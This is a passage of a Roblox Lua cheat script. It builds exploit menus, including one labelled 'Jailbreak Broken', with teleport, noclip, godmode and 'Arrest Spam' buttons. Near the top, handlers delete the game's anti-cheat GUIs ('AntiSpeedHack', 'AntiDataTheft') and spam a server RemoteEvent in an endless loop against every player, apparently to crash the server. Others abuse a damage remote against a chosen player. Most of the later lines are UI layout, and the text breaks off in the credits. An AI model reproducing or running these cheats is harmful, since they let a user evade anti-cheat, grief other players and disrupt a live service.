  679. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 1, 1)
  680. end
  681. end
  682. end
  683. end
  684. end)
  685.  
  686. RemoveAnti.MouseButton1Down:connect(function()
  687. antiKek={'AntiSpeedHack','AntiDataTheft','UI','NO FF','NO FF'}
  688.  
  689. while wait() do
  690. local Player = game.Players.LocalPlayer
  691. local Gui = Player.PlayerGui
  692. for i,v in pairs(antiKek) do
  693. if Gui:FindFirstChild(v) then
  694. Gui:FindFirstChild(v):Remove()
  695. end
  696. end
  697. end
  698. end)
  699.  
  700. CrashS.MouseButton1Down:connect(function()
  701. while true do
  702. wait()
  703. for i,v in pairs(game.Players:GetChildren()) do
  704. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, 491150071)
  705. end
  706. end
  707. end)
  708.  
  709. RRadios.MouseButton1Down:connect(function()
  710. while true do
  711. wait(1.5)
  712. for i,v in pairs(game.Players:GetChildren()) do
  713. game.ReplicatedStorage.Event:FireServer("StopRadio", v)
  714. end
  715. end
  716. end)
  717.  
  718. God.MouseButton1Down:connect(function()
  719. game.ReplicatedStorage.Event:FireServer("TPD", -888888888899999, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  720. end)
  721.  
  722. StayL.MouseButton1Down:connect(function()
  723. game.ReplicatedStorage.Event:FireServer("Equip", "None", "Perks")
  724. game.ReplicatedStorage.Event:FireServer("TPD", 99.9, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  725. end)
  726. end)
  727.  
  728. JailbreakMoneyFarm.Name = "Jailbreak Money Farm"
  729. JailbreakMoneyFarm.Parent = ScrollingFrame
  730. JailbreakMoneyFarm.BackgroundColor3 = Color3.new(1, 1, 1)
  731. JailbreakMoneyFarm.Position = UDim2.new(-0.00217391294, 0, 0.19502075, 0)
  732. JailbreakMoneyFarm.Size = UDim2.new(0, 230, 0, 50)
  733. JailbreakMoneyFarm.Font = Enum.Font.SourceSans
  734. JailbreakMoneyFarm.Text = "Jailbreak Money Farm"
  735. JailbreakMoneyFarm.TextColor3 = Color3.new(0.333333, 1, 1)
  736. JailbreakMoneyFarm.TextScaled = true
  737. JailbreakMoneyFarm.TextSize = 14
  738. JailbreakMoneyFarm.TextWrapped = true
  739. JailbreakMoneyFarm.MouseButton1Down:connect(function()
  740. -- Objects-- Created by Excrio - v2.5
  741. -- v2.5 Notes
  742. -- Added player teleporting!
  743. -- Redid the UI - New font & sizes
  744. -- Bug fixes and more!
  745.  
  746. -- GUI Creation
  747.  
  748. local JailbreakBroken = Instance.new("ScreenGui")
  749. local UI = Instance.new("Frame")
  750. local Part = Instance.new("Frame")
  751. local Frame = Instance.new("Frame")
  752. local Unimportant = Instance.new("TextLabel")
  753. local Unimportant2 = Instance.new("TextLabel")
  754. local TPBFrame = Instance.new("Frame")
  755. local Bank = Instance.new("TextButton")
  756. local Frame_2 = Instance.new("Frame")
  757. local CrimBase1 = Instance.new("TextButton")
  758. local Frame_3 = Instance.new("Frame")
  759. local CrimBase2 = Instance.new("TextButton")
  760. local Frame_4 = Instance.new("Frame")
  761. local PTP = Instance.new("TextButton")
  762. local Frame_5 = Instance.new("Frame")
  763. local Helipad1 = Instance.new("TextButton")
  764. local Frame_6 = Instance.new("Frame")
  765. local Helipad2 = Instance.new("TextButton")
  766. local Frame_7 = Instance.new("Frame")
  767. local Jail = Instance.new("TextButton")
  768. local Frame_8 = Instance.new("Frame")
  769. local Jewlery = Instance.new("TextButton")
  770. local Frame_9 = Instance.new("Frame")
  771. local Police = Instance.new("TextButton")
  772. local Frame_10 = Instance.new("Frame")
  773. local Vault = Instance.new("TextButton")
  774. local Frame_11 = Instance.new("Frame")
  775. local sframe = Instance.new("ScrollingFrame")
  776. local Garage = Instance.new("TextButton")
  777. local Frame_12 = Instance.new("Frame")
  778. local SPlayer = Instance.new("TextLabel")
  779. local Frame_13 = Instance.new("Frame")
  780. local Teleports = Instance.new("TextButton")
  781. local Frame_14 = Instance.new("Frame")
  782. local FBFrame = Instance.new("Frame")
  783. local Noclipp = Instance.new("TextButton")
  784. local Frame_15 = Instance.new("Frame")
  785. local God = Instance.new("TextButton")
  786. local Frame_16 = Instance.new("Frame")
  787. local Arrest = Instance.new("TextButton")
  788. local Frame_17 = Instance.new("Frame")
  789. local cframe = Instance.new("Frame")
  790. local TextLabel = Instance.new("TextLabel")
  791. local TextLabel_2 = Instance.new("TextLabel")
  792. local TextLabel_3 = Instance.new("TextLabel")
  793. local TextLabel_4 = Instance.new("TextLabel")
  794. local TextLabel_5 = Instance.new("TextLabel")
  795. local TextLabel_6 = Instance.new("TextLabel")
  796. local TextLabel_7 = Instance.new("TextLabel")
  797. local TextLabel_8 = Instance.new("TextLabel")
  798. local TextLabel_9 = Instance.new("TextLabel")
  799. local TextLabel_10 = Instance.new("TextLabel")
  800. local TextLabel_11 = Instance.new("TextLabel")
  801. local Functions = Instance.new("TextButton")
  802. local Frame_18 = Instance.new("Frame")
  803. local Credits = Instance.new("TextButton")
  804. local Frame_19 = Instance.new("Frame")
  805. local GoBack = Instance.new("TextButton")
  806. local Open = Instance.new("Frame")
  807. local OpenGUI = Instance.new("TextButton")
  808. local Frame_20 = Instance.new("Frame")
  809. local val = Instance.new("ObjectValue", sframe)
  810.  
  811. -- GUI Properties
  812.  
  813. JailbreakBroken.Name = "JailbreakBroken"
  814. JailbreakBroken.Parent = game.CoreGui
  815.  
  816. UI.Name = "UI"
  817. UI.Parent = JailbreakBroken
  818. UI.Active = true
  819. UI.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  820. UI.BackgroundTransparency = 0.30000001192093
  821. UI.BorderColor3 = Color3.new(1, 1, 1)
  822. UI.BorderSizePixel = 0
  823. UI.Draggable = true
  824. UI.Position = UDim2.new(0.5, -159, 0.5, -219)
  825. UI.Size = UDim2.new(0, 318, 0, 438)
  826. UI.Visible = false
  827.  
  828. Part.Name = "Part"
  829. Part.Parent = UI
  830. Part.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  831. Part.BorderColor3 = Color3.new(1, 1, 1)
  832. Part.BorderSizePixel = 0
  833. Part.Size = UDim2.new(0, 318, 0, 67)
  834.  
  835. Frame.Parent = Part
  836. Frame.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  837. Frame.BorderSizePixel = 0
  838. Frame.Position = UDim2.new(0, 0, 0, 67)
  839. Frame.Size = UDim2.new(0, 318, 0, 5)
  840.  
  841. Unimportant.Name = "Unimportant"
  842. Unimportant.Parent = Part
  843. Unimportant.BackgroundColor3 = Color3.new(1, 1, 1)
  844. Unimportant.BackgroundTransparency = 1
  845. Unimportant.BorderSizePixel = 0
  846. Unimportant.Position = UDim2.new(0, 109, 0, 12)
  847. Unimportant.Size = UDim2.new(0, 100, 0, 24)
  848. Unimportant.Font = Enum.Font.SourceSansLight
  849. Unimportant.FontSize = Enum.FontSize.Size48
  850. Unimportant.Text = "Jailbreak Broken"
  851. Unimportant.TextColor3 = Color3.new(1, 1, 1)
  852. Unimportant.TextSize = 37
  853.  
  854. Unimportant2.Name = "Unimportant2"
  855. Unimportant2.Parent = Part
  856. Unimportant2.BackgroundColor3 = Color3.new(1, 1, 1)
  857. Unimportant2.BackgroundTransparency = 1
  858. Unimportant2.BorderSizePixel = 0
  859. Unimportant2.Position = UDim2.new(0, 109, 0, 38)
  860. Unimportant2.Size = UDim2.new(0, 100, 0, 24)
  861. Unimportant2.Font = Enum.Font.SourceSansLight
  862. Unimportant2.FontSize = Enum.FontSize.Size18
  863. Unimportant2.Text = "By Excrio - v2.5"
  864. Unimportant2.TextColor3 = Color3.new(1, 1, 1)
  865. Unimportant2.TextSize = 17
  866.  
  867. TPBFrame.Name = "TPBFrame"
  868. TPBFrame.Parent = UI
  869. TPBFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  870. TPBFrame.BackgroundTransparency = 1
  871. TPBFrame.Size = UDim2.new(0, 106, 0, 100)
  872. TPBFrame.Visible = false
  873.  
  874. Bank.Name = "Bank"
  875. Bank.Parent = TPBFrame
  876. Bank.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  877. Bank.BorderColor3 = Color3.new(1, 1, 1)
  878. Bank.BorderSizePixel = 0
  879. Bank.Position = UDim2.new(0, 185, 0, 85)
  880. Bank.Size = UDim2.new(0, 97, 0, 25)
  881. Bank.Font = Enum.Font.SourceSansLight
  882. Bank.FontSize = Enum.FontSize.Size18
  883. Bank.Text = "Bank Front"
  884. Bank.TextColor3 = Color3.new(1, 1, 1)
  885. Bank.TextSize = 17
  886.  
  887. Frame_2.Parent = Bank
  888. Frame_2.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  889. Frame_2.BorderSizePixel = 0
  890. Frame_2.Position = UDim2.new(0, 0, 0, 25)
  891. Frame_2.Size = UDim2.new(0, 97, 0, 5)
  892.  
  893. CrimBase1.Name = "CrimBase1"
  894. CrimBase1.Parent = TPBFrame
  895. CrimBase1.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  896. CrimBase1.BorderColor3 = Color3.new(1, 1, 1)
  897. CrimBase1.BorderSizePixel = 0
  898. CrimBase1.Position = UDim2.new(0, 30, 0, 125)
  899. CrimBase1.Size = UDim2.new(0, 97, 0, 25)
  900. CrimBase1.Font = Enum.Font.SourceSansLight
  901. CrimBase1.FontSize = Enum.FontSize.Size18
  902. CrimBase1.Text = "Crim Base 1"
  903. CrimBase1.TextColor3 = Color3.new(1, 1, 1)
  904. CrimBase1.TextSize = 17
  905.  
  906. Frame_3.Parent = CrimBase1
  907. Frame_3.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  908. Frame_3.BorderSizePixel = 0
  909. Frame_3.Position = UDim2.new(0, 0, 0, 25)
  910. Frame_3.Size = UDim2.new(0, 97, 0, 5)
  911.  
  912. CrimBase2.Name = "CrimBase2"
  913. CrimBase2.Parent = TPBFrame
  914. CrimBase2.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  915. CrimBase2.BorderColor3 = Color3.new(1, 1, 1)
  916. CrimBase2.BorderSizePixel = 0
  917. CrimBase2.Position = UDim2.new(0, 30, 0, 165)
  918. CrimBase2.Size = UDim2.new(0, 97, 0, 25)
  919. CrimBase2.Font = Enum.Font.SourceSansLight
  920. CrimBase2.FontSize = Enum.FontSize.Size18
  921. CrimBase2.Text = "Crim Base 2"
  922. CrimBase2.TextColor3 = Color3.new(1, 1, 1)
  923. CrimBase2.TextSize = 17
  924.  
  925. Frame_4.Parent = CrimBase2
  926. Frame_4.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  927. Frame_4.BorderSizePixel = 0
  928. Frame_4.Position = UDim2.new(0, 0, 0, 25)
  929. Frame_4.Size = UDim2.new(0, 97, 0, 5)
  930.  
  931. PTP.Name = "PTP"
  932. PTP.Parent = TPBFrame
  933. PTP.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  934. PTP.BorderColor3 = Color3.new(1, 1, 1)
  935. PTP.BorderSizePixel = 0
  936. PTP.Position = UDim2.new(0, 185, 0, 372)
  937. PTP.Size = UDim2.new(0, 97, 0, 27)
  938. PTP.Font = Enum.Font.SourceSansLight
  939. PTP.FontSize = Enum.FontSize.Size18
  940. PTP.Text = "TP to Player"
  941. PTP.TextColor3 = Color3.new(1, 1, 1)
  942. PTP.TextSize = 17
  943.  
  944. Frame_5.Parent = PTP
  945. Frame_5.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  946. Frame_5.BorderSizePixel = 0
  947. Frame_5.Position = UDim2.new(0, 0, 0, 27)
  948. Frame_5.Size = UDim2.new(0, 97, 0, 3)
  949.  
  950. Helipad1.Name = "Helipad1"
  951. Helipad1.Parent = TPBFrame
  952. Helipad1.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  953. Helipad1.BorderColor3 = Color3.new(1, 1, 1)
  954. Helipad1.BorderSizePixel = 0
  955. Helipad1.Position = UDim2.new(0, 185, 0, 125)
  956. Helipad1.Size = UDim2.new(0, 97, 0, 25)
  957. Helipad1.Font = Enum.Font.SourceSansLight
  958. Helipad1.FontSize = Enum.FontSize.Size18
  959. Helipad1.Text = "Helipad 1"
  960. Helipad1.TextColor3 = Color3.new(1, 1, 1)
  961. Helipad1.TextSize = 17
  962.  
  963. Frame_6.Parent = Helipad1
  964. Frame_6.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  965. Frame_6.BorderSizePixel = 0
  966. Frame_6.Position = UDim2.new(0, 0, 0, 25)
  967. Frame_6.Size = UDim2.new(0, 97, 0, 5)
  968.  
  969. Helipad2.Name = "Helipad2"
  970. Helipad2.Parent = TPBFrame
  971. Helipad2.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  972. Helipad2.BorderColor3 = Color3.new(1, 1, 1)
  973. Helipad2.BorderSizePixel = 0
  974. Helipad2.Position = UDim2.new(0, 185, 0, 165)
  975. Helipad2.Size = UDim2.new(0, 97, 0, 25)
  976. Helipad2.Font = Enum.Font.SourceSansLight
  977. Helipad2.FontSize = Enum.FontSize.Size18
  978. Helipad2.Text = "Helipad 2"
  979. Helipad2.TextColor3 = Color3.new(1, 1, 1)
  980. Helipad2.TextSize = 17
  981.  
  982. Frame_7.Parent = Helipad2
  983. Frame_7.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  984. Frame_7.BorderSizePixel = 0
  985. Frame_7.Position = UDim2.new(0, 0, 0, 25)
  986. Frame_7.Size = UDim2.new(0, 97, 0, 5)
  987.  
  988. Jail.Name = "Jail"
  989. Jail.Parent = TPBFrame
  990. Jail.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  991. Jail.BorderColor3 = Color3.new(1, 1, 1)
  992. Jail.BorderSizePixel = 0
  993. Jail.Position = UDim2.new(0, 30, 0, 85)
  994. Jail.Size = UDim2.new(0, 97, 0, 25)
  995. Jail.Font = Enum.Font.SourceSansLight
  996. Jail.FontSize = Enum.FontSize.Size18
  997. Jail.Text = "Jail"
  998. Jail.TextColor3 = Color3.new(1, 1, 1)
  999. Jail.TextSize = 17
  1000.  
  1001. Frame_8.Parent = Jail
  1002. Frame_8.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1003. Frame_8.BorderSizePixel = 0
  1004. Frame_8.Position = UDim2.new(0, 0, 0, 25)
  1005. Frame_8.Size = UDim2.new(0, 97, 0, 5)
  1006.  
  1007. Jewlery.Name = "Jewlery"
  1008. Jewlery.Parent = TPBFrame
  1009. Jewlery.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1010. Jewlery.BorderColor3 = Color3.new(1, 1, 1)
  1011. Jewlery.BorderSizePixel = 0
  1012. Jewlery.Position = UDim2.new(0, 185, 0, 245)
  1013. Jewlery.Size = UDim2.new(0, 97, 0, 25)
  1014. Jewlery.Font = Enum.Font.SourceSansLight
  1015. Jewlery.FontSize = Enum.FontSize.Size18
  1016. Jewlery.Text = "Jewelry Store"
  1017. Jewlery.TextColor3 = Color3.new(1, 1, 1)
  1018. Jewlery.TextSize = 17
  1019.  
  1020. Frame_9.Parent = Jewlery
  1021. Frame_9.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1022. Frame_9.BorderSizePixel = 0
  1023. Frame_9.Position = UDim2.new(0, 0, 0, 25)
  1024. Frame_9.Size = UDim2.new(0, 97, 0, 5)
  1025.  
  1026. Police.Name = "Police"
  1027. Police.Parent = TPBFrame
  1028. Police.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1029. Police.BorderColor3 = Color3.new(1, 1, 1)
  1030. Police.BorderSizePixel = 0
  1031. Police.Position = UDim2.new(0, 30, 0, 205)
  1032. Police.Size = UDim2.new(0, 97, 0, 25)
  1033. Police.Font = Enum.Font.SourceSansLight
  1034. Police.FontSize = Enum.FontSize.Size18
  1035. Police.Text = "Police HQ"
  1036. Police.TextColor3 = Color3.new(1, 1, 1)
  1037. Police.TextSize = 17
  1038.  
  1039. Frame_10.Parent = Police
  1040. Frame_10.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1041. Frame_10.BorderSizePixel = 0
  1042. Frame_10.Position = UDim2.new(0, 0, 0, 25)
  1043. Frame_10.Size = UDim2.new(0, 97, 0, 5)
  1044.  
  1045. Vault.Name = "Vault"
  1046. Vault.Parent = TPBFrame
  1047. Vault.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1048. Vault.BorderColor3 = Color3.new(1, 1, 1)
  1049. Vault.BorderSizePixel = 0
  1050. Vault.Position = UDim2.new(0, 30, 0, 245)
  1051. Vault.Size = UDim2.new(0, 97, 0, 25)
  1052. Vault.Font = Enum.Font.SourceSansLight
  1053. Vault.FontSize = Enum.FontSize.Size18
  1054. Vault.Text = "Bank Vault"
  1055. Vault.TextColor3 = Color3.new(1, 1, 1)
  1056. Vault.TextSize = 17
  1057.  
  1058. Frame_11.Parent = Vault
  1059. Frame_11.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1060. Frame_11.BorderSizePixel = 0
  1061. Frame_11.Position = UDim2.new(0, 0, 0, 25)
  1062. Frame_11.Size = UDim2.new(0, 97, 0, 5)
  1063.  
  1064. sframe.Name = "sframe"
  1065. sframe.Parent = TPBFrame
  1066. sframe.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1067. sframe.BorderSizePixel = 0
  1068. sframe.Position = UDim2.new(0, 30, 0, 293)
  1069. sframe.Size = UDim2.new(0, 252, 0, 70)
  1070. sframe.BottomImage = ""
  1071. sframe.CanvasSize = UDim2.new(0, 0, 1, 0)
  1072. sframe.MidImage = ""
  1073. sframe.ScrollBarThickness = 20
  1074. sframe.TopImage = ""
  1075.  
  1076. Garage.Name = "Garage"
  1077. Garage.Parent = TPBFrame
  1078. Garage.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1079. Garage.BorderColor3 = Color3.new(1, 1, 1)
  1080. Garage.BorderSizePixel = 0
  1081. Garage.Position = UDim2.new(0, 185, 0, 205)
  1082. Garage.Size = UDim2.new(0, 97, 0, 25)
  1083. Garage.Font = Enum.Font.SourceSansLight
  1084. Garage.FontSize = Enum.FontSize.Size18
  1085. Garage.Text = "Garage"
  1086. Garage.TextColor3 = Color3.new(1, 1, 1)
  1087. Garage.TextSize = 17
  1088.  
  1089. Frame_12.Parent = Garage
  1090. Frame_12.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1091. Frame_12.BorderSizePixel = 0
  1092. Frame_12.Position = UDim2.new(0, 0, 0, 25)
  1093. Frame_12.Size = UDim2.new(0, 97, 0, 5)
  1094.  
  1095. SPlayer.Name = "SPlayer"
  1096. SPlayer.Parent = TPBFrame
  1097. SPlayer.BackgroundColor3 = Color3.new(1, 1, 1)
  1098. SPlayer.BackgroundTransparency = 1
  1099. SPlayer.Position = UDim2.new(0, 32, 0, 379)
  1100. SPlayer.Size = UDim2.new(0, 138, 0, 17)
  1101. SPlayer.Font = Enum.Font.SourceSansLight
  1102. SPlayer.FontSize = Enum.FontSize.Size18
  1103. SPlayer.Text = "Player:"
  1104. SPlayer.TextColor3 = Color3.new(1, 1, 1)
  1105. SPlayer.TextSize = 17
  1106. SPlayer.TextWrapped = true
  1107. SPlayer.TextXAlignment = Enum.TextXAlignment.Left
  1108.  
  1109. Frame_13.Parent = TPBFrame
  1110. Frame_13.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1111. Frame_13.BorderSizePixel = 0
  1112. Frame_13.Position = UDim2.new(0, 30, 0, 360)
  1113. Frame_13.Size = UDim2.new(0, 252, 0, 5)
  1114.  
  1115. Teleports.Name = "Teleports"
  1116. Teleports.Parent = UI
  1117. Teleports.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1118. Teleports.BorderColor3 = Color3.new(1, 1, 1)
  1119. Teleports.BorderSizePixel = 0
  1120. Teleports.Position = UDim2.new(0, 72, 0, 126)
  1121. Teleports.Size = UDim2.new(0, 175, 0, 38)
  1122. Teleports.Font = Enum.Font.SourceSansLight
  1123. Teleports.FontSize = Enum.FontSize.Size24
  1124. Teleports.Text = "Player Teleports"
  1125. Teleports.TextColor3 = Color3.new(1, 1, 1)
  1126. Teleports.TextSize = 20
  1127.  
  1128. Frame_14.Parent = Teleports
  1129. Frame_14.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1130. Frame_14.BorderSizePixel = 0
  1131. Frame_14.Position = UDim2.new(0, 0, 0, 38)
  1132. Frame_14.Size = UDim2.new(0, 175, 0, 5)
  1133.  
  1134. FBFrame.Name = "FBFrame"
  1135. FBFrame.Parent = UI
  1136. FBFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  1137. FBFrame.BackgroundTransparency = 1
  1138. FBFrame.Position = UDim2.new(0, 0, 0, 32)
  1139. FBFrame.Size = UDim2.new(0, 318, 0, 406)
  1140. FBFrame.Visible = false
  1141.  
  1142. Noclipp.Name = "Noclipp"
  1143. Noclipp.Parent = FBFrame
  1144. Noclipp.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1145. Noclipp.BorderColor3 = Color3.new(1, 1, 1)
  1146. Noclipp.BorderSizePixel = 0
  1147. Noclipp.Position = UDim2.new(0, 110, 0, 181)
  1148. Noclipp.Size = UDim2.new(0, 97, 0, 38)
  1149. Noclipp.Font = Enum.Font.SourceSansLight
  1150. Noclipp.FontSize = Enum.FontSize.Size18
  1151. Noclipp.Text = "Enable Noclip"
  1152. Noclipp.TextColor3 = Color3.new(1, 1, 1)
  1153. Noclipp.TextSize = 17
  1154.  
  1155. Frame_15.Parent = Noclipp
  1156. Frame_15.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1157. Frame_15.BorderSizePixel = 0
  1158. Frame_15.Position = UDim2.new(0, 0, 0, 38)
  1159. Frame_15.Size = UDim2.new(0, 97, 0, 5)
  1160.  
  1161. God.Name = "God"
  1162. God.Parent = FBFrame
  1163. God.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1164. God.BorderColor3 = Color3.new(1, 1, 1)
  1165. God.BorderSizePixel = 0
  1166. God.Position = UDim2.new(0, 110, 0, 105)
  1167. God.Size = UDim2.new(0, 97, 0, 38)
  1168. God.Font = Enum.Font.SourceSansLight
  1169. God.FontSize = Enum.FontSize.Size18
  1170. God.Text = "Godmode"
  1171. God.TextColor3 = Color3.new(1, 1, 1)
  1172. God.TextSize = 17
  1173.  
  1174. Frame_16.Parent = God
  1175. Frame_16.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1176. Frame_16.BorderSizePixel = 0
  1177. Frame_16.Position = UDim2.new(0, 0, 0, 38)
  1178. Frame_16.Size = UDim2.new(0, 97, 0, 5)
  1179.  
  1180. Arrest.Name = "Arrest"
  1181. Arrest.Parent = FBFrame
  1182. Arrest.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1183. Arrest.BorderColor3 = Color3.new(1, 1, 1)
  1184. Arrest.BorderSizePixel = 0
  1185. Arrest.Position = UDim2.new(0, 110, 0, 257)
  1186. Arrest.Size = UDim2.new(0, 97, 0, 38)
  1187. Arrest.Font = Enum.Font.SourceSansLight
  1188. Arrest.FontSize = Enum.FontSize.Size18
  1189. Arrest.Text = "Arrest Spam"
  1190. Arrest.TextColor3 = Color3.new(1, 1, 1)
  1191. Arrest.TextSize = 17
  1192.  
  1193. Frame_17.Parent = Arrest
  1194. Frame_17.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1195. Frame_17.BorderSizePixel = 0
  1196. Frame_17.Position = UDim2.new(0, 0, 0, 38)
  1197. Frame_17.Size = UDim2.new(0, 97, 0, 5)
  1198.  
  1199. cframe.Name = "cframe"
  1200. cframe.Parent = UI
  1201. cframe.BackgroundColor3 = Color3.new(1, 1, 1)
  1202. cframe.BackgroundTransparency = 1
  1203. cframe.BorderSizePixel = 0
  1204. cframe.Size = UDim2.new(0, 318, 0, 438)
  1205. cframe.Visible = false
  1206.  
  1207. TextLabel.Parent = cframe
  1208. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  1209. TextLabel.BackgroundTransparency = 1
  1210. TextLabel.BorderSizePixel = 0
  1211. TextLabel.Position = UDim2.new(0, 23, 0, 103)
  1212. TextLabel.Size = UDim2.new(0, 273, 0, 31)
  1213. TextLabel.Font = Enum.Font.SourceSansLight
  1214. TextLabel.FontSize = Enum.FontSize.Size24
  1215. TextLabel.Text = "Design - Excrio"
  1216. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  1217. TextLabel.TextSize = 20
  1218. TextLabel.TextWrapped = true
  1219. TextLabel.TextXAlignment = Enum.TextXAlignment.Left
  1220. TextLabel.TextYAlignment = Enum.TextYAlignment.Top
  1221.  
  1222. TextLabel_2.Parent = cframe
  1223. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  1224. TextLabel_2.BackgroundTransparency = 1
  1225. TextLabel_2.BorderSizePixel = 0
  1226. TextLabel_2.Position = UDim2.new(0, 23, 0, 128)
  1227. TextLabel_2.Size = UDim2.new(0, 273, 0, 31)
  1228. TextLabel_2.Font = Enum.Font.SourceSansLight
  1229. TextLabel_2.FontSize = Enum.FontSize.Size24
  1230. TextLabel_2.Text = "Code - Excrio"
  1231. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  1232. TextLabel_2.TextSize = 20
  1233. TextLabel_2.TextWrapped = true
  1234. TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left
  1235. TextLabel_2.TextYAlignment = Enum.TextYAlignment.Top
  1236.  
  1237. TextLabel_3.Parent = cframe
  1238. TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
  1239. TextLabel_3.BackgroundTransparency = 1
  1240. TextLabel_3.BorderSizePixel = 0
  1241. TextLabel_3.Position = UDim2.new(0, 23, 0, 151)
  1242. TextLabel_3.Size = UDim2.new(0, 273, 0, 135)
  1243. TextLabel_3.Font = Enum.Font.SourceSansLight
  1244. TextLabel_3.FontSize = Enum.FontSize.Size24
  1245. TextLabel_3.Text = "Other Credit - To whomever wrote a thread about getPlayers() as I had some trouble updating the loop, thanks for that."
  1246. TextLabel_3.TextColor3 = Color3.new(1, 1, 1)
  1247. TextLabel_3.TextSize = 20
  1248. TextLabel_3.TextWrapped = true
  1249. TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left
  1250. TextLabel_3.TextYAlignment = Enum.TextYAlignment.Top
  1251.  
  1252. TextLabel_4.Parent = cframe
  1253. TextLabel_4.BackgroundColor3 = Color3.new(1, 1, 1)
  1254. TextLabel_4.BackgroundTransparency = 1
  1255. TextLabel_4.BorderSizePixel = 0
  1256. TextLabel_4.Position = UDim2.new(0, 23, 0, 388)
  1257. TextLabel_4.Size = UDim2.new(0, 273, 0, 29)
  1258. TextLabel_4.Font = Enum.Font.SourceSansLight
  1259. TextLabel_4.FontSize = Enum.FontSize.Size24
  1260. TextLabel_4.Text = ""
  1261. TextLabel_4.TextColor3 = Color3.new(1, 1, 1)
  1262. TextLabel_4.TextSize = 20
  1263. TextLabel_4.TextWrapped = true
  1264. TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left
  1265. TextLabel_4.TextYAlignment = Enum.TextYAlignment.Top
  1266.  
  1267. TextLabel_5.Parent = cframe
  1268. TextLabel_5.BackgroundColor3 = Color3.new(1, 1, 1)
  1269. TextLabel_5.BackgroundTransparency = 1
  1270. TextLabel_5.BorderSizePixel = 0
  1271. TextLabel_5.Position = UDim2.new(0, 23, 0, 234)
  1272. TextLabel_5.Size = UDim2.new(0, 273, 0, 30)
  1273. TextLabel_5.Font = Enum.Font.SourceSansLight
  1274. TextLabel_5.FontSize = Enum.FontSize.Size28
  1275. TextLabel_5.Text = "Changelog"
  1276. TextLabel_5.TextColor3 = Color3.new(1, 1, 1)
  1277. TextLabel_5.TextSize = 25
  1278. TextLabel_5.TextWrapped = true
  1279. TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left
  1280. TextLabel_5.TextYAlignment = Enum.TextYAlignment.Top
  1281.  
  1282. TextLabel_6.Parent = cframe
  1283. TextLabel_6.BackgroundColor3 = Color3.new(1, 1, 1)
  1284. TextLabel_6.BackgroundTransparency = 1
  1285. TextLabel_6.BorderSizePixel = 0
  1286. TextLabel_6.Position = UDim2.new(0, 23, 0, 76)
  1287. TextLabel_6.Size = UDim2.new(0, 273, 0, 31)
  1288. TextLabel_6.Font = Enum.Font.SourceSansLight
  1289. TextLabel_6.FontSize = Enum.FontSize.Size28
  1290. TextLabel_6.Text = "Credit"
  1291. TextLabel_6.TextColor3 = Color3.new(1, 1, 1)
  1292. TextLabel_6.TextSize = 25
  1293. TextLabel_6.TextWrapped = true
  1294. TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left
  1295. TextLabel_6.TextYAlignment = Enum.TextYAlignment.Top
  1296.  
  1297. TextLabel_7.Parent = cframe
  1298. TextLabel_7.BackgroundColor3 = Color3.new(1, 1, 1)
  1299. TextLabel_7.BackgroundTransparency = 1
  1300. TextLabel_7.BorderSizePixel = 0
  1301. TextLabel_7.Position = UDim2.new(0, 23, 0, 263)
  1302. TextLabel_7.Size = UDim2.new(0, 273, 0, 31)
  1303. TextLabel_7.Font = Enum.Font.SourceSansLight
  1304. TextLabel_7.FontSize = Enum.FontSize.Size24
  1305. TextLabel_7.Text = "V1.0 - 1.5 Location Teleporting"
